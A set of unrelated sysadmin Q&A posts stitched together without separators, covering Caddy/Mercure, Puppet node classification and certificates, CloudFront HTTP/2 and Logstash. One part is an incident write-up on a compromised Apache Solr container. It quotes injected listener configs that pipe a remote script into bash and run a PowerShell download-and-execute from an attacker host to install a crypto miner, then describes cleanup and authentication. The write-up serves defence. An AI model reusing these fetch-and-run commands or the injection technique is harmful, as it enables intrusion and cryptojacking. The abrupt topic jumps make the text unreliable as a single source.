I have installed Caddy on CentOS 7 and then downloaded the latest Mercure build, which is based on Caddy. I tried to run Mercure using the command below:
/usr/bin/caddy run --environ --config Caddyfile
The Caddyfile has the following config:
# Learn how to configure the Mercure.rocks Hub on https://mercure.rocks/docs/hub/config
{
    # Debug mode (disable it in production!)
    {$DEBUG}
    # HTTP/3 support
    servers {
        protocol {
            experimental_http3
        }
    }
}

{$SERVER_NAME:domain.com:4134}

log

route {
    encode zstd gzip

    mercure {
        # Transport to use (default to Bolt)
        transport_url {$MERCURE_TRANSPORT_URL:bolt://mercure.db}
        # Publisher JWT key
        publisher_jwt xxxxx
        # Subscriber JWT key
        subscriber_jwt xxxxx
        # Extra directives
        {$MERCURE_EXTRA_DIRECTIVES}
    }

    respond /healthz 200
    respond "Not Found" 404
}
I'm getting this error:
2021/08/15 18:35:14.802 INFO using provided configuration {"config_file": "Caddyfile", "config_adapter": ""}
run: adapting config using caddyfile: parsing caddyfile tokens for 'route': Caddyfile:34 - Error during parsing: unrecognized directive: mercure
I do not know why it is not recognizing the mercure directive, since I used the config file provided with the distribution. Any help, please? Thanks.
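One way to check whether the binary being run actually contains the module (caddy list-modules is a standard Caddy subcommand; the grep pattern is just the directive name in question):

/usr/bin/caddy list-modules | grep mercure

If that prints nothing, the binary at /usr/bin/caddy is a stock Caddy build without the Mercure module.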
I'm learning Puppet now; everything is new to me. After installing a Puppet 7 server and agent on my two learning VMs --
192.168.160.131 puppet-mst.eisen #The puppet server
192.168.160.140 sles12.eisen #The puppet agent
And I've successfully signed the node "sles12.eisen" certificate on the server "puppet-mst.eisen" --
[root@puppet-mst manifests]# puppetserver --version
puppetserver version: 7.4.1
[root@puppet-mst manifests]# puppetserver ca list --all
Signed Certificates:
puppet-mst.eisen (SHA256) 0B:3F:DA:60:2F:2D:D3:91:94:58:E2:B6:32:28:50:8E:D4:1C:A0:8F:A0:CF:94:99:6E:EE:99:46:B4:1D:30:58 alt names: ["DNS:puppet-mst.eisen"] authorization extensions: [pp_cli_auth: true]
puppet-mst (SHA256) C8:89:47:D2:15:74:6E:49:E7:9A:27:B5:EA:10:9B:81:C4:DC:68:E8:B4:01:07:5D:63:34:5A:AF:B6:66:C9:EE alt names: ["DNS:puppet-mst"]
sles12.eisen (SHA256) C5:40:D7:8A:C6:64:BD:E8:BF:D3:BB:5D:01:24:66:03:57:96:84:31:84:42:DF:36:AA:D1:25:14:76:4D:A5:99 alt names: ["DNS:sles12.eisen"]
Then I wrote a test module -- filetest1 -- hoping it would put a file on the agent node in /tmp/puppettest --
[root@puppet-mst manifests]# cat /etc/puppetlabs/code/environments/production/modules/filetest1/manifests/init.pp
class filetest1 {
  file { '/tmp/puppettest/filetest1':
    ensure  => file,
    content => 'Hello World!',
  }
}
[root@puppet-mst manifests]# cat /etc/puppetlabs/code/environments/production/manifests/site.pp
node 'sles12.eisen' {
  include filetest1
}
But the "puppet agent --test" can't work, it's said it either server can't find agent node, or the test module's catalog is missing --
sles12:/tmp/puppettest # puppet --version
7.12.0
sles12:/tmp/puppettest # hostname -f
sles12.eisen
sles12:/tmp/puppettest # puppet agent --test --verbose
Info: Using environment 'production'
Info: Retrieving pluginfacts
Info: Retrieving plugin
Error: Could not retrieve catalog from remote server: Error 500 on SERVER: Server Error: Failed when searching for node sles12.eisen: Failed to find sles12.eisen via exec: Execution of '/etc/puppetlabs/puppet/node.rb sles12.eisen' returned 1:
Warning: Not using cache on failed catalog
Error: Could not retrieve catalog; skipping run
I don't know what's wrong here. Please kindly help. Thanks.
Regards,
Eisen
The error message suggests that you have configured Puppet to use an external node classifier (/etc/puppetlabs/puppet/node.rb), and either the attempt to execute it is failing altogether, or it is terminating with a failure status, or it is not outputting anything.
You may want to explore ENCs later, but now is probably not the time for that. To disable use of an ENC, edit /etc/puppetlabs/puppet/puppet.conf and either remove the node_terminus setting or change its value to plain.
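For example, a minimal sketch of the relevant part of puppet.conf (the section is [server] on newer Puppet and [master] on older releases; node_terminus = exec together with external_nodes is what wires in a node.rb-style ENC):

# /etc/puppetlabs/puppet/puppet.conf (on the Puppet server)
[server]
# Either delete these lines, or switch node_terminus to plain:
node_terminus = plain
# external_nodes = /etc/puppetlabs/puppet/node.rb

Restart the puppetserver service afterwards so the change takes effect.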
Prehistory:
My friend's site started to work slowly.
The site uses Docker.
htop showed that all cores were loaded to 100% by a process /var/tmp/sustes running as user 8983. I tried to find out what sustes is, but Google did not help; however, UID 8983 pointed to the Solr container as the source of the problem.
I tried to update Solr from v6.? to 7.4 and got this message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
I rolled back to v6.6.4 (the only v6 still available on Docker Hub: https://hub.docker.com/_/solr/), since the site had to keep working.
In the Docker logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persisted to File System [{"update-listener":{
    "exe":"sh",
    "name":"newlistener-02",
    "args":["-c",
      "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
    "event":"newSearcher",
    "class":"solr.RunExecutableListener",
    "dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code, which installs a crypto miner (the miner config is at http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can see the full config, but right now we only need the listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings in solrconfig.xml, I found them in /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the contents of this file can also be viewed at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to start/stop: https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the Docker container.
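For example (assuming the stock install layout; the container name matches the docker-compose file later in this post):

# regular install (bin/solr requires the port flag for restart):
bin/solr restart -p 8983
# or, when Solr runs in Docker:
docker restart solr-container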
As I understand it, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and it is fixed in v5.5.5, 6.6.2+ and 7.1+.
The underlying problem is that http://example.com:8983 is freely accessible to anyone, so even though this particular exploit is fixed, let's...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped into /opt/solr/server/solr/ (i.e. next to solr.xml).
As Solr has its own hash checker (a salted SHA-256 hash of the password), a typical htpasswd-style solution cannot be used here. The easiest way I've found to generate the hash is to download the jar file from http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
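If you'd rather not run the jar, here is a short Python sketch of the same idea. It assumes the scheme used by Solr's Sha256AuthenticationProvider (SHA-256 applied twice to salt + password, with the hash and the salt base64-encoded and separated by a space); verify its output against the jar before relying on it:

import base64
import hashlib
import os
import sys

def solr_credentials(password):
    # Random 32-byte salt, like the examples in the Solr docs use.
    salt = os.urandom(32)
    # Assumed scheme: sha256(sha256(salt + password)), both steps over raw bytes.
    digest = hashlib.sha256(salt + password.encode("utf-8")).digest()
    digest = hashlib.sha256(digest).digest()
    # security.json stores "hash salt", both base64-encoded.
    return base64.b64encode(digest).decode() + " " + base64.b64encode(salt).decode()

if __name__ == "__main__":
    # Usage: python solr_hash.py NewPassword
    print(solr_credentials(sys.argv[1]))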
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just the Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container
  # Check if the 'default' core is created. If not, then create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default
  # Access to the web interface from host to container, i.e. 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
    - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default      # configs
    - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data  # indexes
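With that in place, rebuild and restart just the Solr service (service name as defined above):

docker-compose build solr
docker-compose up -d solr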
I'm not able to make a Puppet node join a master; I'm using Puppet Enterprise on the AWS cloud.
Master
puppetserver --version
puppetserver version: 2017.3.0.38
Node
# puppet agent --test
Error: Could not request certificate: Error 403 on SERVER: Forbidden request: /puppet-ca/v1/certificate/ca (method :get). Please see the server logs for details.
Exiting; failed to retrieve certificate and waitforcert is disabled
Obviously the error message is related to permissions on the master side. When I check the log on the master, I see:
ERROR [qtp2147089302-255] [p.t.a.rules] Forbidden request: 10.0.10.224 access to /puppet-ca/v1/certificate/ca (method :get) (authenticated: false) denied by rule 'puppetlabs certificate'.
But I checked that the new HOCON format for auth.conf allows unauthenticated nodes to send a CSR:
{
    "allow-unauthenticated": "*",
    "match-request": {
        "method": "get",
        "path": "/puppet-ca/v1/certificate/",
        "query-params": {},
        "type": "path"
    },
    "name": "puppetlabs certificate",
    "sort-order": 500
}
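(As a sanity check, the endpoint the agent is requesting can also be exercised anonymously with curl from the node; the hostname is a placeholder, and -k is needed because the node does not trust the master's CA yet:

curl -k https://<master-hostname>:8140/puppet-ca/v1/certificate/ca

A 403 here reproduces the agent's error outside of Puppet.)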
I also checked that pe-puppet-server.conf is not using the legacy auth.conf method:
# (optional) Authorize access to Puppet master endpoints via rules specified
# in the legacy Puppet auth.conf file (if true or not specified) or via rules
# specified in the Puppet Server HOCON-formatted auth.conf (if false).
use-legacy-auth-conf: false
max-active-instances: 2
max-requests-per-instance: 0
environment-class-cache-enabled: true
Please advise; the same error message occurs on both Windows and Linux.
I did reboot the entire server (EC2 instance), since reloading puppetserver didn't help. I also made the auth change from the console, as instructed here:
Windows Puppet agent does not connect to the AWS OpsWorks Puppet Enterprise master
I had a similar issue when trying to set up my puppet nodes, but I was using Vagrant instead of AWS.
The fix was to unset the following environment variables: http_proxy, https_proxy, HTTP_PROXY and HTTPS_PROXY.
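For example, in the shell the agent runs from (a sketch; on Windows the equivalent is clearing the same variables before the run):

unset http_proxy https_proxy HTTP_PROXY HTTPS_PROXY
puppet agent --test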
My fix was to remove server_list from puppet.conf, clean up the CM cert, and regenerate the cert. In my case I have autosign=true, so the process was:
Stop PE on the CM:
systemctl stop puppet pxp-agent pe-puppetserver pe-puppetdb
Remove the ssl dir:
rm -fr /etc/puppetlabs/puppet/ssl
Clean up the cert from the primary:
puppetserver ca clean --certname='<CM>'
Run the Puppet agent on the CM:
puppet agent -t
Done.
How to enable HTTP/2 support in CloudFront using serverless?
I am using Serverless (https://github.com/serverless/serverless) to create a simple serverless application that serves HTML + JS from an S3 bucket via CloudFront.
To this end, I am writing a serverless.yml template that will build this setup for me.
What do I need to include/configure in the template in order to enable HTTP/2 support in CloudFront?
This can be achieved by adding HttpVersion: 'http2' under the DistributionConfig: property. See the full example below.
## Specifying the CloudFront distribution to serve your web application
WebAppCloudFrontDistribution:
  Type: AWS::CloudFront::Distribution
  Properties:
    DistributionConfig:
      HttpVersion: 'http2'
      Origins:
        - DomainName: ${self:custom.s3Bucket}.s3.amazonaws.com
          ## An identifier for the origin, which must be unique within the distribution
          Id: WebApp
          CustomOriginConfig:
            HTTPPort: 80
            HTTPSPort: 443
            OriginProtocolPolicy: https-only
          ## In case you want to restrict bucket access, use S3OriginConfig and remove CustomOriginConfig
          # S3OriginConfig:
          #   OriginAccessIdentity: origin-access-identity/cloudfront/E127EXAMPLE51Z
      Enabled: 'true'
      ## Uncomment the following section in case you are using a custom domain
      # Aliases:
      #   - mysite.example.com
      DefaultRootObject: index.html
      ## Since the single-page app is taking care of the routing, we need to make sure every path is served with index.html.
      ## The only exceptions are files that actually exist, e.g. app.js, reset.css
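One common way to implement that fallback is a CustomErrorResponses block under DistributionConfig. A sketch only (it assumes the origin answers 404 for missing objects; a bucket with restricted access typically returns 403 instead, in which case the ErrorCode should be 403):

      CustomErrorResponses:
        - ErrorCode: 404
          ResponseCode: 200
          ResponsePagePath: /index.html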
I've been looking all over the web for a configuration example of the Logstash http input plugin and tried to follow the ones I've found. I'm still running into problems with the following configuration:
input {
  http {
    host => "127.0.0.1"
    post => "31311"
    tags => "wpedit"
  }
}

output {
  elasticsearch { hosts => "localhost:9400" }
}
When running service logstash restart, it responds with Configuration error. Not restarting. Re-run with configtest parameter for details.
So I ran a configuration test (/opt/logstash/bin/logstash --configtest) and it says everything is fine.
So, my question is: how can I find what's wrong with the configuration? Can you see anything obviously incorrect? I'm fairly new to the world of Elasticsearch, if you could not tell...
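(One thing worth checking -- a guess, since the service and a bare --configtest do not necessarily read the same files: point the config test explicitly at the path the service loads, e.g. the conf.d directory used by package installs:

/opt/logstash/bin/logstash --configtest -f /etc/logstash/conf.d/)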